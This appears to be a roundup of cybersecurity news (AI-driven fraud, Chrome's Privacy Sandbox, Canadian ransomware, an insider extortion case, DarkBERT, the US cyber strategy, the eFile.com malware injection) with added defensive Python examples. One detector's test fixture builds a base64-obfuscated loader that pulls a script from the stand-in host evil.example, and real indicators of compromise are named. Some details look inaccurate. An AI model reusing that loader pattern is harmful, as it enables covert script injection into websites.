Seasoned cybercriminals are exploiting AI technology to create new malware attacks and improve their delivery methods. For example, they use AI-generated websites as phishing pages to distribute malicious code secretly. The technology also helps hackers develop polymorphic malware that can bypass antivirus software.

Last month, the FBI issued a warning about scammers using AI image generators to create sexually themed deepfakes to extort money from victims. The extent of these AI-powered schemes remains unclear, but the majority of cases reported to the FBI involve criminal actors utilizing AI models to enhance traditional frauds, including scams targeting loved ones and the elderly through AI voice-cloning technology in phone calls.

In response, the FBI has engaged in constructive discussions with AI companies to address the issue. One proposed solution is using a "watermarking" system to identify AI-generated content and images more easily.

The senior official emphasized that the FBI considers this AI threat a national priority, as it affects all programs within the agency and is a recent development in the cybercrime landscape.

Web Development Revolution: Chrome's Cookie-Free Tools

Third-party cookies have long been a routine part of browsing, and they let advertisers and bad actors alike follow large chunks of your browsing history in order to serve more relevant ads. Third-party cookies do support the functioning of many websites and the experience of Internet users, but most experts agree that alternatives that are easier to control, regulate, and understand are needed.

Google announced in a blog post that it will begin enabling the Privacy Sandbox APIs over the next few days. The initial rollout targets a small percentage of users running Chrome 115, and availability will ramp up gradually over time.

Google started the Privacy Sandbox in 2019 to find a replacement for third-party cookies, which sits uneasily with the company's own advertising business. The feature is not intended to stop advertisers from targeting audiences; instead it makes it harder for them to access users' personal information. In May 2023 Google said the rollout would begin in July 2023 and eventually reach everyone, and that day has now arrived.

The Chrome Developers blog for Chrome 115 describes the "relevance and measurement APIs" it introduces. The Topics API categorizes a user's interests based on their browsing, without sharing that information with advertisers directly. The Attribution Reporting API determines whether ad clicks or views result in conversions. And the Protected Audience API (previously FLEDGE) allows relevant ads to be shown to users based on their previous interactions with advertisers.
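What "does not share this information with advertisers directly" means in practice is easiest to see in a small model, so here is an added example written for this page, not code from Google or the Chrome blog post. It models two rules of the Topics design that are taken from the public Topics explainer rather than from the article (the browser keeps only the user's top few topics per epoch, and a caller is told a topic only if it was itself embedded on a site classified under that topic) and contrasts the result with what a third-party cookie would let the same caller learn. The site-to-topic table and the browsing session are constructed; the real API also returns a random topic a small fraction of the time, which is left out here so the output is deterministic.

```python
from collections import Counter

# Hypothetical site classification used by this model (assumed for the example;
# Chrome uses its own on-device classifier and taxonomy).
SITE_TOPICS = {
    "running-shoes.example": "Fitness",
    "trailmaps.example": "Hiking",
    "gamingnews.example": "Gaming",
    "bank.example": "Finance",
}


class TopicsModel:
    """Minimal model of how the Topics API limits what a caller can learn.

    Two rules are modelled (taken from the public Topics explainer, not from the
    Chrome 115 blog post): the browser keeps only the user's top N topics for the
    epoch, and a caller is told a topic only if it was embedded on a site that the
    browser classified under that topic. The real API also returns a random topic
    a small fraction of the time; that noise is omitted to keep the output fixed.
    """

    def __init__(self, top_n=5):
        self.top_n = top_n
        self.topic_visits = Counter()   # topic -> visits this epoch
        self.observed = {}              # caller -> set of topics it observed
        self.cookie_trail = {}          # caller -> sites where it saw this user

    def visit(self, site, embedded_callers=()):
        """Record one page view and which third parties were embedded on the page."""
        topic = SITE_TOPICS.get(site)
        if topic is not None:
            self.topic_visits[topic] += 1
        for caller in embedded_callers:
            self.cookie_trail.setdefault(caller, []).append(site)
            if topic is not None:
                self.observed.setdefault(caller, set()).add(topic)

    def top_topics(self):
        return [topic for topic, _ in self.topic_visits.most_common(self.top_n)]

    def browsing_topics(self, caller):
        """What document.browsingTopics() would give this caller in the model:
        only top topics that this caller itself observed."""
        seen = self.observed.get(caller, set())
        return [topic for topic in self.top_topics() if topic in seen]

    def third_party_cookie_view(self, caller):
        """For contrast: with a third-party cookie the same caller could tie the
        exact list of sites it was embedded on to one persistent identifier."""
        return list(self.cookie_trail.get(caller, []))


def demo():
    """Constructed browsing session: two ad-tech callers embedded on different sites."""
    browser = TopicsModel()
    browser.visit("running-shoes.example", ["adtech-a.example"])
    browser.visit("trailmaps.example", ["adtech-a.example", "adtech-b.example"])
    browser.visit("gamingnews.example", ["adtech-b.example"])
    browser.visit("bank.example")  # no third parties embedded on this page
    return browser


if __name__ == "__main__":
    b = demo()
    for caller in ("adtech-a.example", "adtech-b.example"):
        print(caller, b.browsing_topics(caller), b.third_party_cookie_view(caller))
```

The interesting row is the bank: it is in the user's top topics, but no caller was embedded there, so nobody receives "Finance". Each ad-tech domain learns only the coarse topics of sites it was already present on, whereas the cookie view hands it the exact site list.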

These updates come shortly after the U.K.'s Competition and Markets Authority (CMA), which oversees the development of the Sandbox, released guidelines for testing it a few weeks ago. Google offered in 2021 to submit to additional CMA oversight to address concerns that removing third-party cookies could put companies that rely on personalized ads at a competitive disadvantage. Under the guidelines, reporting test results is particularly important for ad-tech companies, because it lets the CMA assess whether the Privacy Sandbox has addressed its competition concerns.

Privacy and competition remain among the biggest concerns facing Google and other digital advertising giants in Europe and the U.S. over their online advertising practices. The European Commission has brought a new case against Google asserting that its ad-tech business violates EU antitrust law and suggesting that its massive ad-tech operation may have to be broken up. Norwegian and French regulators have taken action against Meta's behavioral advertising, and Criteo was fined for using personal data for advertising. Courts, lawmakers, and regulators in various countries have pressured other companies over their use of data for advertising as well.

The Privacy Sandbox proposal, in essence, holds that third-party cookies are a privacy disaster and should be replaced by an open, industry-wide standard. Under that standard the tracking logic runs locally inside the browser, and only relevant, anonymized data, such as the kinds of products or topics a visitor may be interested in, is sent to websites and advertisers. Advertisers and publishers then no longer need to track users individually.

The EFF, among other privacy watchdogs, criticized some of the Privacy Sandbox's original proposals, including FLoC (Federated Learning of Cohorts). In response, Google pivoted to a different approach, Protected Audience, which has not drawn the same criticism. The Privacy Sandbox remains controversial among competitors such as Brave, partly because of antitrust concerns.

At first the APIs will be enabled for a limited number of Chrome browser instances. As the rollout progresses, Google will gradually increase the number of devices while monitoring for problems. Some groups of browsers will see only a subset of the newly available APIs, so that issues associated with a specific API are easier to detect and isolate.

Google says the process may begin next week, on July 24. During that week the APIs will be enabled for about 35 percent of eligible browsers so that developers can test them, rising to 60 percent by the end of August, around the time Chrome 116 reaches general availability. It is unclear when the APIs will be enabled for 99 percent of Chrome 115 browsers.

At this stage Google says most of the small groups tested with limited access should have all the relevance and measurement APIs enabled, but it will keep some small, isolated groups in which not every API is turned on.

Google originally planned to phase out third-party cookies in late 2023, but onboarding issues and regulatory investigations delayed the project. The CMA, which had previously voiced concern that Google's own advertising business would gain unfairly from the new approach, published guidelines in June for third parties testing Google's Privacy Sandbox tools.

Google cleared the CMA's regulatory hurdles in 2022, which means its plans to remove third-party cookies can go ahead provided that it sticks to the commitments it made to obtain approval. The company said it "will continue to work closely with the CMA" before taking further steps.

Ransomware Outbreak in Canada: Cybersecurity Meltdown

Canadians and Canadian organizations are increasingly falling victim to ransomware attacks. Sami Khoury, head of the Canadian Centre for Cyber Security, has stressed the urgency of addressing the problem, saying the country has much to do to defend itself against outside threats.

Ransomware attacks once centred on breaking into a system, locking it, and demanding money to release it. Khoury notes that most attackers have since changed tactics: they now break in to steal data and sensitive information, which can be sold on the dark web. Companies have become more sophisticated about backing up their systems so that they can recover if they are locked out, which has pushed attackers toward data theft.

That is why attackers now seek out information and data they can monetize. According to the report, such incidents have become far too common, and Khoury considers cybercrime one of the greatest threats the nation faces.

The Canadian Centre for Cyber Security received 305 reports of ransomware attacks last year, compared with 295 the year before. With such incidents now so common, Khoury considers cybercrime, including ransomware, the number one cyber threat facing the country.

Over the last year ransomware attacks have hit many of Canada's biggest brands and organizations, including Suncor Energy Inc., Indigo, and Sobeys. Khoury adds that the true number of incidents is far higher than the number reported.

Companies are reluctant to report cybercrime that has affected them, he says, which explains the gap between the reported figures and the estimated real number of incidents. He recommends preventive measures such as strong, unique passwords, multi-factor authentication, and employee education about these security risks.

Given the escalating geopolitical tensions involving Russia, Ukraine, and China, Khoury said that protecting the country from cybersecurity threats is of the utmost importance. Cyberattacks will not stop, but Khoury insists the nation can still defend itself.

Attackers now focus on stealing sensitive and personally identifiable data rather than simply worming their way into systems and demanding cash, because that data can be held over the victim with the threat of release or sale.

These steps, he says, are crucial not only to combating cybercrime today but also to defending critical infrastructure in the future, countering nation-state threats against Canada, and fighting the misinformation spreading across the country.

A report released last month by the Communications Security Establishment, of which Khoury's Cyber Centre is a part, urged Canadians around the first anniversary of Russia's invasion of Ukraine "to be vigilant and prepared" for potential malicious activity online.

A Global Post report in May warned of "abnormal activity" by a state-sponsored actor associated with China, which was using the network's built-in administration tools to move through systems so that its actions would look like normal administrative activity.

The government has also pulled TikTok from federal devices because its parent company is based in China, where the law allows authorities to access user data. Khoury said he would leave any recommendation on TikTok to the government, but made clear that the general public also has a part to play.

Khoury believes citizens should not become pessimistic about the fight against cyber attackers despite the influx of threats and security concerns now catching the public's attention. As ransomware attacks surge across the country and sensitive data is targeted, Canada faces a serious cybersecurity challenge.

According to Khoury, prompt action is needed: accurate reporting, proactive prevention, and heightened public awareness. Collaboration, resilience, and international cooperation are essential to the country's defense against ever-evolving cyber threats. Despite the challenges, Canada remains dedicated to safeguarding its digital landscape from cyber-attacks.

Using Ransomware to Extort Employers by Impersonating a Gang

A 28-year-old man from Fleetwood, Hertfordshire, has been convicted in a UK court of attempting to extort his employer with a forged ransom demand and of unauthorised access to a computer with intent to commit further offences.

In a press release, the South East Regional Organised Crime Unit (SEROCU) explained the conviction of Ashley Liles, who was working as an IT security analyst at a company in Oxford when it suffered a ransomware attack in February 2018.

As in many ransomware attacks, the cybercriminals contacted the company's executive team to demand a ransom payment.

Liles joined the company's internal investigation and incident response effort alongside his colleagues and the police.

During this period, Liles is said to have tried to profit from the attack by tricking his employer into paying the ransom to him instead of to the actual external attacker.

The SEROCU announcement reads, "Instead of pursuing a criminal case against the company, Liles also began a further and secondary attack against the company unbeknownst to the police, his colleagues, or his employer." 

He accessed a board member's private emails more than 300 times, and he altered the original blackmail email sent by the attacker, changing the payment details it contained.

The plan was to divert the payment away from the attacker's account and into Liles' own cryptocurrency wallet.

Liles also created an email address almost identical to the original attacker's and used it to send his employer emails pressing for payment, SEROCU said.

The company's owner refused to pay. The internal investigation then revealed that the board member's private emails had been accessed from Liles' home IP address, pointing to him as the source of the secondary attack.
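The two manoeuvres SEROCU describes, a lookalike sender address and a payment address that changes mid-thread, are exactly the things an incident responder should check mechanically on every message in an extortion thread. The following is an added example for this page, not code from SEROCU or the company involved; the email thread, addresses and wallet strings are constructed, and the wallet pattern is a simplified bech32-style regex assumed for the demonstration.

```python
import re

# Constructed email thread for the example. The addresses and wallet strings are
# invented; they are not from the SEROCU release.
THREAD = [
    {"from": "recovery-team@protonmail.example",
     "body": "Your files are encrypted. Pay 5 BTC to bc1qoriginalwalletaddress000 within 72 hours."},
    {"from": "recovery-team@protonmail.example",
     "body": "Reminder: 5 BTC to bc1qoriginalwalletaddress000. 48 hours left."},
    {"from": "recovery-team@protonrnail.example",
     "body": "Change of plan. Send the 5 BTC to bc1qattackerreplacementaddr999 instead."},
]

# Simplified bech32-style pattern (an assumption for the example), enough to pull
# wallet strings out of prose.
WALLET_RE = re.compile(r"\bbc1[a-z0-9]{20,}\b")


def levenshtein(a, b):
    """Edit distance; a lookalike address is typically one or two edits away from
    the original ('rn' for 'm', a dropped letter, a swapped TLD)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def review_thread(thread, max_dist=2):
    """Compare each follow-up with the first ransom message. Flag senders that are
    close to, but not identical with, the original address, and any payment
    address that did not appear in the original demand."""
    origin = thread[0]["from"]
    original_wallets = set(WALLET_RE.findall(thread[0]["body"]))
    findings = []
    for idx, msg in enumerate(thread[1:], start=1):
        dist = levenshtein(msg["from"], origin)
        if 0 < dist <= max_dist:
            findings.append((idx, "lookalike_sender", msg["from"]))
        for wallet in WALLET_RE.findall(msg["body"]):
            if wallet not in original_wallets:
                findings.append((idx, "payment_address_changed", wallet))
    return findings


if __name__ == "__main__":
    for finding in review_thread(THREAD):
        print(finding)
```

The check is anchored on the first message on purpose: an attacker who wants to be paid has no reason to change the wallet, so a new address in a later message is a red flag regardless of who appears to have sent it, and the lookalike test catches the sender change even when the body is unremarkable.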

By the time SEROCU's cyber-crime team arrived at Liles' home to seize his computer, he had realized the investigation was closing in on him and had wiped his devices. Investigators were nevertheless able to recover the incriminating data.

Liles initially denied any involvement; at a hearing at Reading Crown Court five years later, he pleaded guilty. He is due to be sentenced on July 11, 2023.

In the UK, unauthorised access to a computer is punishable by up to two years in prison, and blackmail by up to 14 years.

Hackers and Cybercriminals Use Dark Web Data to Train DarkBert AI

A team of South Korean researchers has released a paper describing how they trained a machine-learning model on a large dark web corpus collected by crawling the Tor network. The data inevitably included many shady sites: crypto, pornography, hacking, weapons, and other categories. Because of ethical concerns, the team decided not to use the data as it came.

DarkBERT's pre-training corpus was filtered before being fed to the model so that sensitive data would not be included in training, since bad actors could otherwise extract that data from the model.
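The filtering step is the part a practitioner building a similar corpus has to get right, so here is an added example of a masking pass of that kind. It is written for this page and is not the DarkBERT team's filter; the patterns are assumed for the demonstration (a production filter would need wider coverage, such as IPv6, phone numbers and handles), and the sample text with every identifier in it is constructed. Card numbers are only masked when they pass the Luhn check, so order numbers and timestamps are left alone.

```python
import re
from collections import Counter

# Constructed sample of the kind of text a dark web crawl returns. Every identifier
# in it is invented for the example.
SAMPLE = ("contact darkseller@protonmail.example or visit abcdefghijklmnop.onion, "
          "server 203.0.113.42, pay to bc1qexamplewallet0000000000000000, "
          "card 4111 1111 1111 1111 (order 1234 5678 9012 3456)")

# Identifier patterns assumed for this example; a real filter needs broader coverage.
PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "ONION": re.compile(r"\b[a-z2-7]{16,56}\.onion\b"),
    "IPV4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "BTC": re.compile(r"\bbc1[a-z0-9]{25,59}\b"),
}
# 13 to 19 digits, optionally separated by spaces or dashes; validated with Luhn below.
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,19}\b")


def luhn_ok(number):
    """Luhn checksum, so that arbitrary digit runs (order numbers, timestamps)
    are not mistaken for payment card numbers."""
    digits = [int(d) for d in number if d.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(text):
    """Replace each identifier with a typed placeholder and return the masked text
    plus a count per type, so the filtering step can be audited afterwards."""
    counts = Counter()
    for label, pattern in PATTERNS.items():
        text, n = pattern.subn(f"<{label}>", text)
        if n:
            counts[label] += n

    def card_sub(match):
        if luhn_ok(match.group(0)):
            counts["CARD"] += 1
            return "<CARD>"
        return match.group(0)  # fails Luhn: not a card, leave it

    text = CARD_RE.sub(card_sub, text)
    return text, dict(counts)


if __name__ == "__main__":
    print(mask(SAMPLE))
```

Order matters: IP addresses are masked before the card pass so their digit groups cannot be mistaken for a card, and the per-type counts give a cheap way to spot a crawl batch where a pattern suddenly stops firing, which usually means the regex, not the data, has changed.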

Although DarkBERT may sound like a nightmare, the researchers say it is a promising project that will do more than help combat cybercrime; it will also advance natural language processing research in the field.

The team reached the dark web through the Tor network, which gives access to onion sites without any login, crawled what it found into a raw database, and used that data to build the DarkBERT language model.

Large language models have exploded onto the market, with more appearing every day. Most of the giants, such as OpenAI's ChatGPT and Google's Bard, are trained on text from across the internet: websites, articles, books, you name it. Their training data, and therefore their outputs, overlap heavily.

The researchers describe their findings in a paper titled "DarkBERT: A Language Model for the Dark Side of the Internet."

The paper has not yet been peer reviewed. DarkBERT takes its name from RoBERTa, the transformer-based model on which it is built, which Facebook researchers released in 2019.

Facebook's optimization approach produced state-of-the-art results on the General Language Understanding Evaluation (GLUE) benchmark, which tests the general language understanding capabilities of NLP systems.

Meta described RoBERTa as an "outstanding algorithm for pretraining natural language processing (NLP) systems that are robustly optimized", an improvement on BERT, which Google released in 2018 for NLP pretraining. Google had open-sourced BERT, which is what allowed Meta to build on it and improve its performance.

RoBERTa's own authors had argued that BERT was undertrained; the South Korean researchers behind DarkBERT showed that RoBERTa itself could be taken further. Over roughly two weeks they continued pre-training RoBERTa on the preprocessed dark web data, producing DarkBERT. The paper reports that the work ran on a machine with four NVIDIA A100 80GB GPUs and an Intel Xeon Gold 6348 CPU.

How does DarkBERT work?

Despite what its name may suggest, DarkBERT is designed to support security and law enforcement work. It is not intended for malicious use.

Hackers and ransomware groups often upload sensitive data to the dark web in the hope of selling it. The paper shows that DarkBERT can help security researchers automatically identify such sites, and it can also crawl dark web forums to monitor exchanges of illegal information taking place there.

DarkBERT is not publicly available. Because it was trained on sensitive data, the researchers have not released the model; they say a release of a version trained on the preprocessed corpus is planned, but have not given a date.

DarkBERT may represent a future in which AI models are trained on targeted data and tailored to specific tasks. Unlike ChatGPT and Google Bard, which are general-purpose, DarkBERT is a tool built specifically for tracking hackers, not one for everyday use.

Even with the many AI chatbots now available, you need to be careful when using them. Fake ChatGPT applications can carry malware, and you risk exposing sensitive data, as Samsung employees did recently.

When using these popular AI chatbots, make sure you are on the genuine website rather than an imitation. OpenAI, Microsoft, and Google have yet to release official apps for their chatbots, so any app claiming to be ChatGPT, Bing Chat, or Google Bard should be treated with suspicion.

White House Cybersecurity Strategy warns of "Complex Threat Environment"

On March 2 the White House published a national cybersecurity strategy that lists threats to U.S. networks, on the ground and in space, from Russian and Chinese hackers.

"Evolving intelligence" suggests that options are being explored for potential cyberattacks against critical U.S. infrastructure, President Biden warned on Monday.

Anne Neuberger, Mr. Biden's deputy national security adviser for cyber and emerging technology, told reporters Monday afternoon that U.S. officials have observed "preparatory work" linked to nation-state actors, including scanning of U.S. companies' websites and hunting for vulnerabilities, although there is no evidence of a specific cyberattack threat.

On Thursday the Biden administration released its comprehensive national cybersecurity strategy, which sets out the steps needed to protect the nation's cyber ecosystem from threats.

The strategy rests on several key pillars: protecting critical infrastructure from cyberattacks, disrupting and dismantling cyber criminals, and establishing international partnerships.

The document replaces the Trump administration's 2018 cybersecurity strategy, but the White House will continue to implement Space Policy Directive 5, issued by the previous administration in September 2020, which focuses on the protection of space systems.

The first pillar raises cybersecurity requirements for critical sectors in order to secure critical infrastructure. It also calls for public-private partnerships and federal network modernization to keep pace with threats.

Several bipartisan cyber bills aimed at protecting critical infrastructure, including in the health and energy sectors, were introduced and passed by Congress last year.

Kemba Walden, the acting National Cyber Director, said the government should use every tool at its disposal, including military and law enforcement authorities, to disrupt malicious cyber activity and pursue the perpetrators. 

Walden assumed the role of acting director after Chris Inglis resigned for health reasons. Biden nominated Inglis in 2021 as the nation's first National Cyber Director; Inglis announced his resignation in mid-February. 

The strategy's second pillar focuses on disrupting and dismantling threat actors, including criminal groups and nation-state adversaries.

To protect national security and public safety, the government will use every available tool to "make it harder for them to pose a threat to national security." 

The third pillar is expanded collaboration with foreign partners that share the same mission; the administration said it will counter cyberattacks through international coalitions of "like-minded nations." 

SPD-5 was billed as a first step toward a comprehensive security policy for satellites and the systems that connect them to the Internet. 

Because space systems now serve as critical infrastructure and provide essential services, experts have warned that they face a growing number of attacks. 

A major thrust of the National Cybersecurity Strategy is realigning incentives so that long-term investments are favored. The strategy argues that the biggest, most capable, and best-positioned actors in the digital ecosystem, whether in the public or private sector, can and should shoulder a larger share of the burden of mitigating cyber risk in their respective industries. When faced with trade-offs, public and private entities must have the resources, capabilities, and incentives to choose long-term solutions over temporary fixes. 

The United States also remains committed to international cyber partnerships, working with allies and partners to build defensible, resilient, and values-aligned digital ecosystems. Keeping shared interests at the forefront means promoting the expectation that all states behave responsibly in cyberspace, while making irresponsible behavior by a state both costly and isolating.

The strategy outlines a path to a secure digital future. Implementing it will lay the foundation for trustworthy cyber infrastructure on which the administration's infrastructure, clean energy, equity, democracy, and economic opportunity goals depend. At its most fundamental level, it recognizes that cyberspace exists not for its own sake but as a means to pursue those goals. 

eFile.com Hosted Malware on its Website

Malicious code was injected into eFile.com's server, an online service that assists people with filing tax returns. This resulted in malware being delivered to users' computers. 

The service, an IRS-authorized e-file provider that is not operated by the agency itself, was serving malware for several weeks before it was cleaned up earlier this week. 

E-file is the IRS's method for submitting tax returns electronically, usually without printing any documents, and the IRS recommends it for all federal filings. Taxpayers can use third-party software or websites to submit their returns, although these external services can introduce additional security risk.

With the April 18 tax-filing deadline approaching, cybercriminals are stepping up campaigns against tax-filing services and their users to steal private information. eFile.com, one of the more popular platforms for filing returns, has once again become a victim of tax-season cybercrime. 

The incident affects eFile.com specifically, not the IRS's own e-file infrastructure or similarly named domains. 

The injected code is a base64-encoded script that loads additional JavaScript from the malicious domain infoamanewonliag[.]online. If a visitor follows the fake prompt it displays, they are asked to download an executable named "update.exe" or "installer.exe", depending on their browser. 

On further inspection, researchers found that the executables drop a PHP backdoor that connects to 47.245.6.91, an Alibaba-hosted IP address in Tokyo. The same IP address hosted the infoamanewonliag domain that the malicious popper.js script contacted. 

In mid-March, a Reddit user first reported that eFile.com had been compromised, with visitors redirected to a fake 'network error' page and served a bogus browser update. 

Clicking the browser-update link serves either update.exe or installer.exe, depending on the browser. In a post for the SANS Internet Storm Center, Johannes Ullrich noted that the malicious files had a very low detection rate on VirusTotal. 
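The loader described above, a base64 blob decoded inside a bundled script that then pulls a second-stage script from a domain the site never legitimately uses, is the kind of injection a site owner can catch by scanning the JavaScript actually being served. The following Python is an added example, not code from eFile.com, SANS or the original report: it decodes the arguments of `atob()` calls, extracts any URLs they contain, and flags hosts outside an allowlist together with eval-of-base64 patterns. The sample script, the `ALLOWED_HOSTS` set and the `evil.example` URL are constructed for the example; in the real incident the second stage came from infoamanewonliag[.]online.

```python
"""Added example: detect a base64-obfuscated script loader injected into served JS."""
import base64
import re
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption for the example).
ALLOWED_HOSTS = {"www.efile.com", "efile.com"}

# Constructed sample: a benign helper library with an appended loader that decodes
# a base64 blob and injects a remote script tag. Placeholder URL, not the real IOC.
INJECTED_URL = "https://evil.example/loader.js"
_PAYLOAD = (
    "var s=document.createElement('script');"
    f"s.src='{INJECTED_URL}';document.head.appendChild(s);"
)
SAMPLE_JS = (
    "/* popper.js v2 */ function popper(){return 1;}\n"
    "eval(atob('" + base64.b64encode(_PAYLOAD.encode()).decode() + "'));\n"
)

# atob('<base64>') with at least 20 base64 characters, to skip short literals.
B64_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{20,})['\"]\s*\)")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"<>]*)?")


def decode_atob_args(js: str) -> list:
    """Return the decoded text of every atob() literal that is valid base64."""
    out = []
    for m in B64_RE.finditer(js):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        out.append(raw.decode("utf-8", "replace"))
    return out


def external_hosts(text: str, allowed: set) -> set:
    """Hostnames referenced by URLs in text that are not on the allowlist."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
    return {h for h in hosts if h and h not in allowed}


def analyze_js(js: str, allowed: set = ALLOWED_HOSTS) -> dict:
    """Flag eval/Function of decoded base64 and any off-allowlist hosts,
    including hosts that only appear inside the decoded payload."""
    decoded = decode_atob_args(js)
    hosts = external_hosts(js, allowed)
    for payload in decoded:
        hosts |= external_hosts(payload, allowed)
    eval_of_base64 = bool(decoded) and ("eval(" in js or "Function(" in js)
    return {
        "decoded_payloads": decoded,
        "external_hosts": sorted(hosts),
        "eval_of_base64": eval_of_base64,
    }


if __name__ == "__main__":
    print(analyze_js(SAMPLE_JS))
```

Run this against every script the site serves (including ones fetched at runtime) on a schedule and diff the result against a known-good baseline; an unexpected host or a new eval-of-base64 hit on a file that should never change is exactly the signal eFile.com's users were waiting weeks for.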

He also found that 'update.exe' was signed with a valid code-signing certificate issued to a company named Sichuan Niurui Science and Technology Co., Ltd.

In a follow-up post, Ullrich explained that update.exe is a Python-based downloader that fetches a PHP script, which in turn establishes communication with the command-and-control server and relays messages to the attacker. 

Analysis of a sample of the PHP script seen by MalwareHunterTeam showed it to be a backdoor that gives threat actors remote access to, and control of, the infected device. 

Once installed, the PHP script runs in the background. 

The malware polls the attackers' command-and-control server every ten seconds, and as soon as it receives a task to run on the infected device, it executes it. 
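That fixed ten-second poll is what makes this backdoor visible in network telemetry: a host talking to one destination at near-constant intervals stands out from ordinary browsing, whose gaps are irregular. The following Python is an added example, not code from the report or from any of the researchers cited: it groups constructed proxy log lines by source and destination, computes inter-arrival times, and flags pairs whose spread (standard deviation divided by the mean) is small. The log format, the IP addresses (documentation ranges) and the thresholds are assumptions for the example; against real logs you would expect to see the 47.245.6.91 address named above as the destination.

```python
"""Added example: flag periodic outbound connections (C2 beaconing) in proxy logs."""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev

# Constructed sample log: "<ISO timestamp> <src ip> <dst ip>:<port> <path>".
# 10.1.2.3 polls 203.0.113.10 roughly every 10 s, as the backdoor above does;
# the remaining lines are ordinary, irregular browsing by two hosts.
SAMPLE_LOG = """\
2023-04-03T10:00:00Z 10.1.2.3 203.0.113.10:80 /index.php
2023-04-03T10:00:10Z 10.1.2.3 203.0.113.10:80 /index.php
2023-04-03T10:00:20Z 10.1.2.3 203.0.113.10:80 /index.php
2023-04-03T10:00:31Z 10.1.2.3 203.0.113.10:80 /index.php
2023-04-03T10:00:40Z 10.1.2.3 203.0.113.10:80 /index.php
2023-04-03T10:00:50Z 10.1.2.3 203.0.113.10:80 /index.php
2023-04-03T10:00:03Z 10.1.2.3 198.51.100.7:443 /news
2023-04-03T10:00:04Z 10.1.2.3 198.51.100.7:443 /news/style.css
2023-04-03T10:02:47Z 10.1.2.3 198.51.100.7:443 /news/article
2023-04-03T10:00:05Z 10.1.2.9 198.51.100.7:443 /login
2023-04-03T10:00:09Z 10.1.2.9 198.51.100.7:443 /home
2023-04-03T10:00:41Z 10.1.2.9 198.51.100.7:443 /logout
"""


def parse_line(line: str):
    """Split one log line into (timestamp, src_ip, dst_ip)."""
    ts, src, dst_port, _path = line.split(maxsplit=3)
    dst = dst_port.rsplit(":", 1)[0]
    t = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return t, src, dst


def find_beacons(log_text: str, min_hits: int = 5, max_jitter: float = 0.15) -> list:
    """Return [(src, dst, mean_interval_seconds)] for source/destination pairs with
    at least min_hits connections whose gaps are nearly constant. max_jitter is the
    allowed coefficient of variation (stdev / mean); a hard-coded sleep like the
    ten-second poll above sits far below 0.15, while normal browsing is well above it."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            t, src, dst = parse_line(line)
            times[(src, dst)].append(t)

    hits = []
    for (src, dst), ts in times.items():
        if len(ts) < min_hits:
            continue
        ts.sort()  # logs are not guaranteed to be in order per pair
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        m = mean(gaps)
        if m > 0 and pstdev(gaps) / m <= max_jitter:
            hits.append((src, dst, round(m, 1)))
    return hits


if __name__ == "__main__":
    for src, dst, interval in find_beacons(SAMPLE_LOG):
        print(f"possible beacon: {src} -> {dst} every {interval}s")
```

Tune `min_hits` to the window you are examining (six hits in a minute is plenty for a ten-second beacon; a daily poll needs a much longer window) and expect attackers who add random sleep to push the jitter up, which is why the threshold is a parameter rather than a constant.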

The eFile backdoor offered only basic functionality, but that was still enough to give the attackers full access to an infected Windows PC, and from there a foothold for attacks on other systems on a corporate network. 

eFile.com has yet to explain what happened. A cybercrime group named OLOC, linked to LockBit ransomware, claimed to have attacked the site previously, in January 2022. 

According to the researcher, eFile removed the malicious JavaScript from the site on April 3. The attackers appear to have tried to remove the infection themselves before then, probably to cover their tracks. As part of the attack, malicious code had been injected into every page on eFile.com.